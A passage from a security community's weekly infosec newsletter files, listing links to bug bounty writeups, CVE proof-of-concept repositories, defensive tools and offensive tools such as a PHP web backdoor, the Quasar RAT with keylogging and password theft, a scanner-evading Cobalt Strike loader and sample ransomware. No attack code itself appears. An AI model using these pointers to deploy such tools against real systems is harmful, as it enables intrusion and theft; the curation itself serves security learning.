scenarios.](https://github.com/W01fh4cker/Serein_Linux)\n- [HiPHP - Backdoor to control PHP-based sites : hiphp can be controlled by sending commands, files, and tokens to the site over HTTP/HTTPS. After copying the HIPHP_HOLE_CODE and placing it in any PHP file on the target website, you will have permission to enter it, read all files, delete and even upload new files to it. The backdoor is also password protected.](https://github.com/yasserbdj96/hiphp)\n\n- [Black-Dragon - An Advanced Automation Tool For Web-Recon Developed For Linux Systems.](https://github.com/Cyber-Guy1/BlackDragon)\n- [Frogy - Subdomain enumeration script. It's unique in the way it is built.](https://github.com/iamthefrogy/frogy)\n- [SQLiDetector - Simple python script that helps you to detect error-based SQL injection by sending multiple requests with 9 payloads and checking the responses against 152 regex patterns for different databases.](https://github.com/eslam3kl/SQLiDetector)\n- [sectools - Offensive Security Python Toolbox - A Python native library containing lots of useful functions to write efficient scripts to hack stuff.](https://github.com/p0dalirius/sectools)\n- [Smersh - A pentest oriented collaborative tool used to track the progress of your company's missions and generate reports.](https://github.com/CMEPW/Smersh)\n- [CirrusGo - A fast tool to scan SaaS and PaaS apps, written in Go](https://github.com/Ph33rr/cirrusgo)\n- [Geopipe - tool that takes domains from stdin and outputs to stdout those with at least one IP address associated with the selected country.](https://gitlab.com/lu-ka/geopipe)\n- [EMBA Firmware analyzer version 1.1.0 aka Las Vegas Edt. is out now - a lot of new features including system emulation environment, status bar and Ubuntu support](https://github.com/e-m-b-a/emba/releases/tag/1.1.0-Las-Vegas-Edt)\n- [SCMKit v1 - Source Code Management Attack Toolkit](https://github.com/xforcered/SCMKit)\n\n*Cloud Security :*\n- [Assisted Log Enabler for AWS - Find AWS resources that are not logging, and turn logging on.](https://github.com/awslabs/assisted-log-enabler-for-aws)\n\n*Blue Team Techniques :*\n- [BlueHound - open-source tool that helps blue teams pinpoint the security issues that actually matter](https://github.com/zeronetworks/BlueHound)\n- [Matos : An open-source cloud security tool for analyzing multi-cloud infrastructure security.](https://github.com/cloudmatos/Matos)\n- [Siembol : An open-source, real-time Security Information & Event Management tool based on big data technologies, providing a scalable, advanced security analytics framework. Siembol normalizes, enriches, and alerts on data from various sources, which allows security teams to respond to attacks before they become incidents.](https://github.com/G-Research/siembol)\n- [Sauron is a minimalistic cross-platform malware scanner with non-blocking realtime filesystem monitoring using YARA rules, written in Rust.](https://github.com/evilsocket/sauron)\n\n*Active Directory/IR :*\n- [ADEnum - find misconfigurations through the LDAP protocol and exploit some of those weaknesses with Kerberos.](https://github.com/SecuProject/ADenum)\n- [VolatileDataCollector : for dumping volatile data during Incident Response engagements](https://github.com/gtworek/VolatileDataCollector)\n- [AzurePolicyTestFramework - A CLI tool to test Azure Policy relying on Terraform + Golang](https://github.com/microsoft/AzurePolicyTestFramework)\n- [Jazzer - Coverage-guided, in-process fuzzing for the JVM](https://github.com/CodeIntelligenceTesting/jazzer)\n- [dc-sonar - Analyzing AD domains for security risks related to user accounts](https://github.com/ST1LLY/dc-sonar)\n\n*Advanced tools/frameworks to make hackers' lives easier :*\n- Cobalt Strike\n- Metasploit\n- Burp Suite Pro\n- HCL AppScan\n- Nessus\n- Splunk etc.\n\n*Advanced threat & Malware Analysis Tools :*\n- [AceLdr - Avoid Memory Scanners: A position-independent reflective loader for Cobalt Strike. Zero results from Hunt-Sleeping-Beacons, BeaconHunter, BeaconEye, Patriot, Moneta, PE-sieve, or MalMemDetect.](https://github.com/kyleavery/AceLdr)\n- [PortEx : Java library for static malware analysis of Portable Executable files](https://github.com/struppigel/PortEx)\n\n*Cryptography :*\n- [Paranoid project checks for well known weaknesses on cryptographic artifacts such as public keys, digital signatures and general pseudorandom numbers](https://github.com/google/paranoid_crypto)\n- [MD5 Length Extension Attack, based on https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://joakim.uddholm.com/posts/md5-length-extension-attack)\n\n*Defender - RAT/Ransomware :*\n- [Develop your own RAT - EDR + AV Defense. ppt : (https://docs.google.com/presentation/d/1UZmFo_TvSS2TvPJKlDjIW1kTVjYGGaYO86Buh2UgbaI/mobilepresent#slide=id.g11cdb36f978_1_366)](https://github.com/dobin/antnium)\n- [Lockbit3.0 Microsoft Defender MpClient.dll DLL Hijacking PoC.](https://github.com/Sh0ckFR/Lockbit3.0-MpClient-Defender-PoC)\n\n*PowerShell :*\n- [PowerShell script that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines](https://github.com/last-byte/PersistenceSniper/)\n- [CreateProcess - A small PoC that creates processes in Windows](https://github.com/helpsystems/CreateProcess)\n- [Creating Processes Using System Calls](https://www.coresecurity.com/core-labs/articles/creating-processes-using-system-calls)\n\n*Projects/Personal :*\n- [Simple ransomware implementation in python for educational purposes](https://github.com/dubniczky/Ransomware)\n- [USB Rubber Ducky type scripts written for the digiSpark](https://github.com/Mohit0/DigiSpark-Scripts)\n"
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_00.md",
    "content": "# Weekly Cybersecurity update 00: v0.1\nThe idea is to give back to the community and save time (because time is valuable) with HIGH QUALITY CYBERSECURITY UPDATES.\nThis is a trial version. \n\nLast Issue date : 2 Aug 2022 : 7:00 AM IST \n\n*Current Issue date : 9 Aug 2022 : 7:00 AM IST*\n\nNext Issue date : 16 Aug 2022 : 7:00 AM IST\n    \n#### Give Back to Community - [If you like the work please support us ❣️ by contributing and joining]\n#### Supported By - [ResetHacker Community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty) \n- Contributors : - Vikram.\n\n#### Hey Hackers, here is the Agenda for this Week (2 - 9 Aug 2022): \n- **1. Hiring, challenges & Free courses**\n- **2. Events, Talks & Webinars**\n- **3. CVE POCs and analysis**\n- **4. Vulnerability/bug Writeups**\n- **5. HackerOne Reports**\n- **6. Research, Whitepapers & Statistics Reports**\n- **7. Twitter threads**\n- **8. Tools, RATs and Ransomware**\n- **9. More updates on Security: SOC, CISA Bulletin, Ransomware etc**\n\n----------------------------------------------------------------------------------\n\n**Job Openings**\n\n- [netsec's Q3 2022 Information Security Hiring Thread](https://www.reddit.com/r/netsec/comments/w25lkc/rnetsecs_q3_2022_information_security_hiring/)\n\n**Vulnerability/bug Writeups**\n\n- [MyBB 0day Authenticated Remote Code Execution.](https://0x1337.ninja/2022/07/19/mybb-0day-authenticated-remote-code-execution/)\n\n- [AWS cloud security and Misconfigurations](https://dhiyaneshgeek.github.io/cloud/security/2022/06/23/aws-misconfigurations/)\n\n- [The Miracle Exploit, so called because it affects many products based on Oracle Fusion Middleware and Oracle online systems. Miracle stands for Middleware Fusion with Oracle](https://peterjson.medium.com/miracle-one-vulnerability-to-rule-them-all-c3aed9edeea2)\n\n- [XSS vulnerabilities in Google Cloud, Google Play could lead to account hijacks](https://portswigger.net/daily-swig/xss-vulnerabilities-in-google-cloud-google-play-could-lead-to-account-hijacks)\n\n- [Gsuite Domain takeover through delegation](https://infosecwriteups.com/gsuite-domain-takeover-through-delegation-9d6664c91142)\n\n- [Careful Who You Colab With: abusing Google Colaboratory](https://medium.com/mlearning-ai/careful-who-you-colab-with-fa8001f933e7)\n\n- [Microsoft Teams — Cross Site Scripting (XSS) Bypass CSP](https://medium.com/@numanturle/microsoft-teams-stored-xss-bypass-csp-8b4a7f5fccbf)\n\n- [SSRF and Account Takeover via XSS in ERPNext.](https://tech-blog.cymetrics.io/en/posts/huli/erpnext-ssrf-and-xss-to-account-takeover/)\n\n- [CQ - a code security scanner](https://github.com/chris-anley/cq)\n\n- [Awesome-RCE-techniques : collection of RCE techniques](https://github.com/p0dalirius/Awesome-RCE-techniques)\n\n- [IDOR - Broken Authentication](https://redmethod.hashnode.dev/idor-broken-authentication?s=09)\n\n- [Admin account takeover via weird Password Reset Functionality](https://0xmahmoudjo0.medium.com/admin-account-takeover-via-weird-password-reset-functionality-166ce90b1e58)\n\n- [PII Disclosure of Apple Users ($10k)](https://ahmdhalabi.medium.com/pii-disclosure-of-apple-users-10k-d1e3d29bae36)\n\n\n**Twitter threads**\n\n- @LazySaad explains how to find IDORs and how we can use the user_id to verify whether the IDOR exists or not.\nhttps://twitter.com/LazySaad/status/1538664657749266433?s=20&t=FDeNgK3zKzJ4EhiTU8H3Pg\n\n- @tabaahi_ explains how beginners can look for open redirects, what tools to use, how to go about finding them and where one should report open redirects. Check it out here. It’s a great starting point for newbies in Infosec.\nhttps://twitter.com/tabaahi_/status/1539159408026218496?t=mF-ote2xiy0kFuvVgHjwTA&s=19\n\n- A great thread from Hossein NafisiAsl where he explains how an HTTP Request Smuggling bug turns into mass account takeover and shares a great GitHub repository where he collected amazing write-ups & tips.\nhttps://twitter.com/MeAsHacker_HNA/status/1538862575617814528?t=YitdeDYSt2_fdJTWiK_qmA&s=19\n\n- Guide on building source code review skills from the beginning: @dhakal_ananda’s Twitter thread (https://twitter.com/dhakal_ananda/status/1544574015779606529?t=kb-B5IJfENymNZb7sLgnHw&s=19)\n\n\n**HackerOne reports**\n\n- [DROPBOX - Send Fax from Anyone's HelloFax Account Due to Misconfigured Email Validation $4,913](https://saynsec.medium.com/mail-server-misconfiguration-leads-to-sending-a-fax-from-anyones-account-on-hellofax-dropbox-bbp-aab3d97ab4e7)\n\n- [Race condition in faucet when using starport $5,000](https://blog.credshields.com/race-condition-in-tendermints-starport-7cebe176d935)\n\n- [Possible to make restricted files public on Phabricator via Diffusion $2,000](https://hackerone.com/reports/1560717)\n\n**CVEs**\n\n- [fanweiOA #rce POC](https://github.com/xiaoheihei741/fanweiOA-rce-poc)\n\n- CVE-2022-26712: The POC for SIP-Bypass Is Even Tweetable\n\n    From the author's post: \"I found some new attack surfaces in the macOS PackageKit.framework, and successfully disclosed 15+ critical SIP-Bypass vulnerabilities. Apple has addressed 12 of them with CVEs assigned so far. There are still some reports in Apple’s processing queue. All of them are interesting logic issues, and of course each has a successful exploit demonstration.\n\n    Here, CVE-2022-26712 is a very simple one, which was patched in macOS 12.4. However, I found another way to exploit it again; finally Apple addressed it as CVE-2022-32826 in macOS 12.5.\"\n\n    https://jhftss.github.io/CVE-2022-26712-The-POC-For-SIP-Bypass-Is-Even-Tweetable\n\n- CVE-2022-26138 : Confluence Hardcoded Password PoC\n\n    https://github.com/z92g/CVE-2022-26138\n\n- wget-root exploit\n    https://github.com/CopernicusPY/wget-root\n\n- CVE-2022-32744: \n    Critical Samba admin password reset flaw\n    https://securityonline.info/cve-2022-32744-critical-samba-admin-password-reset-flaw/\n\n- CVE-2022-0441 (2022-03-07)\n    The MasterStudy LMS WordPress plugin before 2.7.6 does not validate some parameters given when registering a new account, allowing unauthenticated users to register as an admin\n\n    https://github.com/biulove0x/CVE-2022-0441\n\n- CVE-2022-0529 (2022-02-09)\n    A flaw was found in Unzip. The vulnerability occurs during the conversion of a wide string to a local string and leads to a heap out-of-bounds write. This flaw allows an attacker to supply a specially crafted zip file, leading to a crash or code execution.\n\n    https://github.com/nanaao/unzip_poc\n    https://github.com/ByteHackr/unzip_poc\n\n------------------------------------------\n**More updates on Security**\n\n- CISA - Bulletin (SB22-206)\n    Vulnerability Summary for the Week of July 18, 2022\n    https://www.cisa.gov/uscert/ncas/bulletins/sb22-206\n\n- SOC: Weekend Wrap-Up\n    https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up\n\n- A collection of APT and cybercriminal campaigns (updated on a regular basis)\n    https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections\n\n- Security vulnerabilities affecting MediaTek Smartphone, Tablet, AIoT, Smart display, Smart platform, OTT and NB-IoT chipsets.\n    https://corp.mediatek.com/product-security-bulletin/August-2022\n\n**Videos :**\n- 60 Remote Code Execution in 60 minutes (YouTube video) - Laluka\n    https://www.youtube.com/watch?v=Z9GN6cuggYQ\n    \n- The Real World Of Cyber Security | Cyber Security talk with Sainath Volam \n    https://www.youtube.com/watch?v=GG3aCxIw-2M\n\n- Check out Tib3rius' Mentoring Monday : \n    https://www.youtube.com/c/Tib3rius/videos\n    \n------------------------------------------\n**Tools**\n\n- SSTImap - Automatic SSTI detection tool with interactive interface\n    SSTImap was developed as a new SSTI detection tool based on Tplmap. The main feature of this tool and \n    a key difference with Tplmap is the interactive mode, which enhances detection and exploitation. Also, \n    the payload for Smarty was changed to work without the {{php}}{{/php}} tag, which was disabled by default in \n    Smarty 3.0. New payloads for other template engines will be developed.\n\n    https://github.com/vladko312/SSTImap\n\n- GPSJam \n    GPS Interference Map shows where GPS jamming systems could be operating on a particular day \n    (most often associated with military conflicts).\n    Data source: ADS-B Exchange API.\n    http://gpsjam.org\n\n- PurplePanda\n\n    This tool fetches resources from different cloud/SaaS applications focusing on permissions in order to identify \n    privilege escalation paths and dangerous permissions in the cloud/SaaS configurations. \n    Note that PurplePanda searches for privilege escalation paths both within a platform and across platforms.\n    The name comes from the animal Red Panda. This panda eats peas, just like Purple Panda, which can ingest API keys/tokens\n    found by the PEASS tools. The color was changed to purple because this tool is meant mainly for Purple Teams \n    (because it can be highly useful for both Blue and Red Teams).\n\n    https://github.com/carlospolop/PurplePanda\n\n\n- Quasar #RAT\n\n    Free, Open-Source Remote Administration Tool for Windows\n\n    Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface, Quasar is the perfect remote administration solution for you.\n\n    Features:\n▫️  TCP network stream (IPv4 & IPv6 support)\n▫️  Fast network serialization (Protocol Buffers)\n▫️  Compressed (QuickLZ) & Encrypted (TLS) communication\n▫️  UPnP Support\n▫️  Task Manager\n▫️  File Manager\n▫️  Startup Manager\n▫️  Remote Desktop\n▫️  Remote Shell\n▫️  Remote Execution\n▫️  System Information\n▫️  Registry Editor\n▫️  System Power Commands (Restart, Shutdown, Standby)\n▫️  Keylogger (Unicode Support)\n▫️  Reverse Proxy (SOCKS5)\n▫️  Password Recovery (Common Browsers and FTP Clients)\n    ... and many more!\n\n    https://github.com/quasar/Quasar\n\n\n- Reverse Image Search Engine\n    http://immerse.zone\n\n    Search by uploaded image or URL;\n    Search by sketch (it can be drawn directly in the browser);\n    Search by quote (can be selected from the catalog).\n\n    (but unfortunately, the search results are not yet very accurate)\n\n**SOURCES:** \n    AppSecEzine #441\n    InfoSec Writeups Weekly #14\n    HackerOne\n    CISA\n    opalsec\n    Twitter/reddit\n    Telegram private group\n"
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_01.md",
    "content": "## v0.2 Weekly Cybersecurity 01 \n\n   **Current Issue date : 9th August 2022 : 7:00 AM**\n    \n    Last Issue date : 2 Aug 2022 : 7:00 AM\n    Next Issue date : 16 Aug 2022 : 7:00 AM\n    \n#### Give Back to Community - [If you like the work please support us ❣️ by contributing and joining]\n#### Supported By - [ResetHacker Community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty) \n- Contributors : - Vikram.\n\n#### Hey Hackers, here is the Agenda for this Week (2 - 9 Aug 2022): \n- **1. Hiring, challenges & Free courses**\n- **2. Events, Talks & Webinars**\n- **3. CVE POCs and analysis**\n- **4. Vulnerability/bug Writeups**\n- **5. HackerOne Reports**\n- **6. Research, Whitepapers & Statistics Reports**\n- **7. Twitter threads**\n- **8. Tools, RATs and Ransomware**\n- **9. More updates on Security: SOC, CISA Bulletin, Ransomware etc**\n\n-------------------------------------------------------------------------------------------------\n\n### **Hiring, challenges & Free courses**\n- [Hiring Week01 : 2 - 9 Aug 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022)\n\n- [Microsoft Certified Fundamentals - Exam PAID](https://docs.microsoft.com/en-us/certifications/fundamentals?wt.mc_id=fundamentals_linkedin_organicsocial_wwl)\n\n- \"Windows Kernel Debugging, Internals, and Exploitation\" Pre-Class Survey - Beta.\n    \n    [Cedric Halbronn has created this class to show how you can exploit vulnerabilities in the Windows kernel.](https://docs.google.com/forms/d/e/1FAIpQLScojZa4zQmlAO5365EYp8gGcd7npMtk9YyxVh7MG1jrUp7mNQ/viewform)\n\n### **Events, Talks, Podcasts & Webinars**\n\n- [What We're Looking Forward to at Black Hat, DEF CON, and BSidesLV 2022](https://www.rapid7.com/blog/post/2022/08/04/what-were-looking-forward-to-at-black-hat-def-con-and-bsideslv-2022/)\n- [cloudsec 2022 Conference Talk Recordings](https://youtube.com/playlist?list=PLCPCP1pNWD7N2SPaz4cmuS27xutaf32jy)\n- [Upcoming Conferences and events](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/Conference)\n\n### **CVE POCs and analysis**\n\n   - [CVE Overview -> 2 - 9 Aug 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md)\n   \n   - CVE Hunting Tips #001 - https://medium.themayor.tech/bug-bounty-tips-001-17879af4509f\n       \n\n### **Vulnerability/bugbounty Writeups**\n\n- [F5 has released its quarterly security notification for August 2022, which informs customers about 21 vulnerabilities affecting BIG-IP and other products.](https://support.f5.com/csp/article/K14649763)\n- [\"Use after return\" bugs and how higher-level programming languages (C, Go, and Rust) can guard against this behavior.](https://danielmangum.com/posts/risc-v-bytes-stack-use-after-return/)\n- [How I got a 10,000 penetration testing project job with bug bounty](https://junoonbro.medium.com/how-i-got-a-10-000-penetration-testing-project-job-with-bug-bounty-b38ab4357ce4)\n- [XSS in Gmail's Amp4Email](https://www.adico.me/post/xss-in-gmail-s-amp4email)\n- [QNAP Poisoned XML Command Injection - Silently Patched](https://www.rapid7.com/blog/post/2022/08/04/qnap-poisoned-xml-command-injection-silently-patched/)\n- [Hijacking email with Cloudflare Email Routing](https://albertpedersen.com/blog/hijacking-email-with-cloudflare-email-routing/)\n- [Stored XSS to account takeover going beyond document.cookie](https://medium.com/@smhtahsin33/stored-xss-to-account-takeover-going-beyond-document-cookie-970e42362f43)\n- [HackerOne 6000+ Sheets Vulnerability List](https://docs.google.com/spreadsheets/d/1mfj6InLiXaKvemRimH1wowP4UTe_HExemGajId_JRD8/edit?usp=drivesdk)\n- [How I test for web cache vulnerabilities + tips and tricks](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)\n- [Web Application Reconnaissance Guide, Cybersec | Shubham Dhungana](https://shubhdhungana.medium.com/web-application-reconnaissance-guide-cybersec-shubham-dhungana-17858c967e2b)\n- [How we have pwned Root-Me in 2022.](https://spawnzii.github.io/posts/2022/07/how-we-have-pwned-root-me-in-2022/)\n- [The Mobile Attack Surface : Common issues facing Android applications as well as how individuals/organizations can begin to understand and measure the security level of their applications.](https://engineering.mercari.com/en/blog/entry/20220729-the-mobile-attack-surface/)\n- [ZOHO (Before 10.0.662) ManageEngine Desktop Central – SQL Injection / Arbitrary File Write](https://labs.jumpsec.com/zoho-manage-engine-desktop-central-sql-injection-arbitrary-file-write/)\n- [Phishers Bounce Lures Off Unprotected Snapchat, Amex Sites](https://www.inky.com/en/blog/phishers-bounce-lures-off-unprotected-snapchat-amex-sites)\n\n### **HackerOne reports**\n\n- [$10,000 : One-click account hijack for anyone using Apple sign-in with Reddit, due to response-type switch + leaking href to XSS on www.redditmedia.com](https://hackerone.com/reports/1567186)\n- [$50,00 IDOR vulnerability: Getting access to mod logs from any public or restricted subreddit](https://hackerone.com/reports/1658418)\n- [$2,500 Privilege Escalation : Ingress-nginx path allows retrieval of ingress-nginx serviceaccount token](https://hackerone.com/reports/1382919)\n- [$1,500 Improper Restriction of Authentication Attempts: Brute Force of fabric-ca server admin account](https://hackerone.com/reports/411364)\n- [$500 DoS : Enrolling to a CA that returns an empty response crashes the node process](https://hackerone.com/reports/506412)\n\n### **Research, Analysis, Whitepapers & Statistics Reports**\n- [Edgescan - 2022 Vulnerability Statistics Report](https://drive.google.com/file/d/19qUBeq7jGaxP1kWBGaH1XPA6ZbsCpisAG/view?usp=sharing)\n- [Top trends in Application Security in 2022](https://www.tripwire.com/state-of-security/devsecops/top-trends-application-security/)\n- [Determining Malicious Probabilities Through **ASNs**](https://www.akamai.com/blog/security/determining-malicious-probabilities-through-asns)\n- [Hacking together an ASM platform using ProjectDiscovery tools](https://blog.projectdiscovery.io/asm-platform-using-projectdiscovery-tools/)\n- [Asset discovery on public bug bounty programs](https://github.com/trickest/inventory)\n- [Everything you need to know about hash length extension attacks : old, but still has its charm](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)\n- [Elastic Open Sources Their Endpoint Security Protection YARA Ruleset](https://www.elastic.co/blog/continued-leadership-in-open-and-transparent-security)\n- [LockBit Ransomware Sideloads Cobalt Strike Through Microsoft Security Tool](https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool)\n- [Inside Windows Defender System Guard Runtime Monitor](https://blog.syscall.party/2022/08/02/inside-windows-defender-system-guard-runtime-monitor)\n- [How leaked Twitter API keys can be used to build a bot army](https://cloudsek.com/whitepapers_reports/how-leaked-twitter-api-keys-can-be-used-to-build-a-bot-army/)\n- [New Era of Phishing Payloads After The Deprecation of Macros](https://fourcore.io/blogs/modern-initial-access-vector-macro-depreciation)\n- [How passwordless works?](https://goteleport.com/blog/how-passwordless-works/)\n- [Discover an AntiDebug feature: a newbie approach](https://s1ckb017.github.io/2022/07/30/Discover-an-AntiDebug-feature-a-newbie-approach.html)\n\n### **Twitter threads**\n\n- A massive widespread malware attack on GitHub. Over 35k repositories are infected. - https://twitter.com/stephenlacy/status/1554697077430505473?s=20&t=7z_cL3390oiD_sx5WA2AYw\n- Widespread Solana private key compromise - https://twitter.com/0xfoobar/status/1554627762807349249?t=OZAESu9ySlHBPwgTMBju7w&s=08\n\n### **Projects, Tools, RATs and Ransomware**\n- [Black-Dragon - An Advanced Automation Tool For Web-Recon Developed For Linux Systems.](https://github.com/Cyber-Guy1/BlackDragon)\n- [SQLiDetector - Simple python script that helps you to detect error-based SQL injection by sending multiple requests with 9 payloads and checking the responses against 152 regex patterns for different databases.](https://github.com/eslam3kl/SQLiDetector)\n- [sectools - Offensive Security Python Toolbox - A Python native library containing lots of useful functions to write efficient scripts to hack stuff.](https://github.com/p0dalirius/sectools)\n\n- [Smersh - A pentest oriented collaborative tool used to track the progress of your company's missions and generate reports.](https://github.com/CMEPW/Smersh)\n- [CirrusGo - A fast tool to scan SaaS and PaaS apps, written in Go](https://github.com/Ph33rr/cirrusgo)\n- [semgrep - static source code analyzer which works on 20+ languages.](https://semgrep.dev/docs/getting-started/)\n\n- [Paranoid project checks for well known weaknesses on cryptographic artifacts such as public keys, digital signatures and general pseudorandom numbers](https://github.com/google/paranoid_crypto)\n- [MD5 Length Extension Attack, based on https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://joakim.uddholm.com/posts/md5-length-extension-attack)\n\n- [Simple ransomware implementation in python for educational purposes](https://github.com/dubniczky/Ransomware)\n- [USB Rubber Ducky type scripts written for the digiSpark](https://github.com/Mohit0/DigiSpark-Scripts)\n\n- [Develop your own RAT - EDR + AV Defense. 
ppt : (https://docs.google.com/presentation/d/1UZmFo_TvSS2TvPJKlDjIW1kTVjYGGaYO86Buh2UgbaI/mobilepresent#slide=id.g11cdb36f978_1_366)](https://github.com/dobin/antnium)\n- [Lockbit3.0 Microsoft Defender MpClient.dll DLL Hijacking PoC.](https://github.com/Sh0ckFR/Lockbit3.0-MpClient-Defender-PoC)\n\n- [For More ](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Tools/Readme.md)\n\n### **More update on Secuirty and future: SOC, CISA Bulletin, Ransomware etc**(Outdated)\n    - [The Future of the SOC Is XDR](https://www.rapid7.com/blog/post/2022/08/03/the-future-of-the-soc-is-xdr/)\n    - [CISA - Bulletin (SB22-213) - Vulnerability Summary for the Week of July 25, 2022](https://www.cisa.gov/uscert/ncas/bulletins/sb22-213)\n    - CTF Events] - (https://ctftime.org/event/list/)\n    \n    - [Private pentesting Reports](https://github.com/juliocesarfort/public-pentesting-reports)\n    - [MalwareApiLibrary - Сollection of apis used for malware development:StringManagementLib & WinApiManagementLib](https://github.com/MalwareApiLib/MalwareApiLibrary)\n    - [Awsome Threat intelligence](https://github.com/hslatman/awesome-threat-intelligence)\n    - [Awesome-Red-Teaming](https://github.com/0xMrNiko/Awesome-Red-Teaming)\n    - [Red Team infastructure VM](https://github.com/chipmanfu/RGI-redteam-scripts)\n    - [Red Team cheatsheet](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets) \n    - [Awesome CobaltStrike](https://github.com/zer0yu/Awesome-CobaltStrike) \n    - [BloodHound - uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment.](https://github.com/BloodHoundAD/BloodHound)\n    - [Introducing BloodHound 4.2 — The Azure Refactor](https://posts.specterops.io/1cff734938bd\n    - [Active Directory Enumeration: BloodHoud](https://www.hackingarticles.in/active-directory-enumeration-bloodhound/)\n    - [Active direcctory Basics : PART 
1, 2, 3, 4.](https://rootdse.org/posts/active-directory-basics-1/)\n    \n### SOURCES :\nhttps://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md\n\n\n### Volunteer Opportunities :\n\n    If you want to get involved in making **Weekly Cybersecurity Update** a better, but aren't sure how.\n    Contact @Attr1b on Telegram and\n    Please write a reason How do you plan to improve it?\n\n"
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_02.md",
    "content": "## Weekly Infosec Update 02\n\n**Issue date: 16th August 2022, 7:00 AM**\n\nLast issue date: 2nd Aug 2022, 7:00 AM  \nNext issue date: 22nd Aug 2022, 7:00 AM\n\n#### Give Back to Community - [If you like the work, please support us ❣️ by contributing and joining]\n#### Supported By - [ResetHacker Community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n- Contributors: Vikram, Paul Miller\n\n#### Hey Hackers, here is the agenda for this week (9 - 16 Aug 2022):\n- **1. Hiring & Free course**\n- **2. Events, Talks & Webinars**\n- **3. CVEs: PoC and analysis**\n   - *CVE Week 02 -> 9 - 16 Aug 2022*\n- **4. Vulnerability/Bug Writeups**\n   - *HackerOne Report Segment*\n   - *Bug Analysis and Writeups Segment*\n- **5. Research Article/Whitepaper & Statistics Reports**\n- **6. Twitter thread**\n- **7. Tools, RATs and Ransomware**\n- **8. Red Team Resources**\n- **9. Security & Researchers: Pentesting, SOC, Red Team, Blue Team, Threat Intelligence, Ransomware etc.**\n\n-------------------------------------------------------------------------------------------------\n\n### Hiring & Free course\n- [Hiring Week 01 : Aug 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022)\n- FedTAFE is offering a free self-paced CCNA right now; the offer expires on the 17th. - https://forms.office.com/r/AGMJmJMk3x\n- Free API security course - https://university.apisec.ai/\n\n### Events, Talks & Webinars\n\n- [Black Hat 2022 recap - cloud, eBPF, global conflicts, supply chain, and more](https://sysdig.com/blog/blackhat-2022-recap/)\n- [Black Hat 2022 paid trainings schedule](https://www.blackhat.com/tr-22/training/schedule/index.html)\n- [Black Hat USA demos that include silver ticket with password, S4U2Self, UAC bypass etc.](https://github.com/tyranid/blackhat-usa-2022-demo)\n- [DEF CON 2022 videos & slides](https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/)\n- [Offensive Security Penetration Testing with Kali Linux (PEN-200) ongoing live classes 2022](https://www.youtube.com/channel/UCqrnQLyFW8NpCZ1YF5-VrZQ/videos)\n- [Bug Bounty 101: #20 — Rapidly Testing APIs for Broken Access Control by Z-winK.](https://www.youtube.com/watch?v=qvbNVRqbYLE)\n- [Speakers lineup THREAT CON 2022](https://threatcon.io/agenda)\n\n### CVEs: PoC and analysis\n*CVE Week 02 -> 9 - 16 Aug 2022*\n- https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md\n   - Microsoft security CVEs, Cisco CVEs, Windows Server, Visual Studio Code, VMware, Web admin, CVE-2022-31101 PoC, CVE-2022-33980 etc.\n\n### Vulnerability/Bug Reports, Writeups and Analysis\n\n*HackerOne Report Segment:*\n\n- [$2900 - Improper Authentication : Admin panel exposure without credentials at https://plus-website.shopifycloud.com/admin.php](https://hackerone.com/reports/1417288)\n- [$2500 - Code Injection (Kubernetes): Ingress-nginx annotation injection allows retrieval of ingress-nginx serviceaccount token and secrets across all namespaces](https://hackerone.com/reports/1378175)\n- [$2400 - Improper Authentication : Disabling context isolation, nodeIntegrationInSubFrames using an unauthorised frame.](https://hackerone.com/reports/1417288)\n- [$500 - Improper Authentication : Many commands can be manipulated to delete identities or affiliations](https://hackerone.com/reports/348090)\n\n*Bug Analysis and Writeups Segment:*\n- [SSRF bypass list in 2022](https://pastebin.com/YbsKrMpf)\n- [DEF CON 30 - Finding security vulnerabilities through fuzzing](http://fuzzing.in/codelabs/finding_security_vulnerabilities/index.html?index=..%2F..index#0)\n- [Email Confirmation bypass at Instagram (Meta)](https://medium.com/@avinash_/email-confirmation-bypass-at-instagram-cc968f9a126)\n- [How I earned a $6000 bug bounty from Cloudflare](https://deb0con.medium.com/how-i-earned-a-6000-bug-bounty-from-cloudflare-db6949e39cf7)\n- [How I earned a $7000 bug bounty from Grab (RCE Unique Bugs)](https://deb0con.medium.com/how-i-earned-a-7000-bug-bounty-from-grab-rce-unique-bugs-5e5037c5a58d)\n- [Process injection: breaking all macOS security layers with a single vulnerability](https://sector7.computest.nl/post/2022-08-process-injection-breaking-all-macos-security-layers-with-a-single-vulnerability/)\n- [Local priv-esc vulnerability in 